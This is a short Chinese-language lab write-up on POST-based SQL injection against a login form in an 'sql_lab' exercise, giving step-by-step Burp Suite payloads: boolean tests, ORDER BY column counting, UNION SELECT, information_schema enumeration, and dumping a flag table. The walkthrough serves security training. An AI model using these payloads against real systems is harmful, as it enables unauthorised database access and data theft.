sql_lab之sqli中的post注入
Post注入
用burpsuit抓包去做
Post第一关:(gxa5)
1.判断是否存在注入
username=1'or 1=1 #&password=123&submit=%E7%99%BB%E5%BD%95?有回显
username=1'or 1=2?#&password=123&submit=%E7%99%BB%E5%BD%95?没有回显
则证明存在sql注入
2.判断字段数
username=1'or 1=1 order by 4 #&password=123&submit=%E7%99%BB%E5%BD%95?没有回显
username=1'or 1=1 order by 3?#&password=123&submit=%E7%99%BB%E5%BD%95?有回显
则证明字段数是3
3.用union查询判断回显点
username=1'union select 1,2,3 -- a&password=123&submit=%E7%99%BB%E5%BD%95
4.查出当前数据库名
username=1'union select 1,database(),3 -- a&password=123&submit=%E7%99%BB%E5%BD%95
5.查询当前数据库中的表名
username=1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' -- a&password=123&submit=%E7%99%BB%E5%BD%95
6.查询flag表中的字段名
username=1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='flag' -- a&password=123&submit=%E7%99%BB%E5%BD%95
7.查字段里面的数据
username=1'union select 1,group_concat(id),group_concat(flag) from flag -- a&password=123&submit=%E7%99%BB%E5%BD%95
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!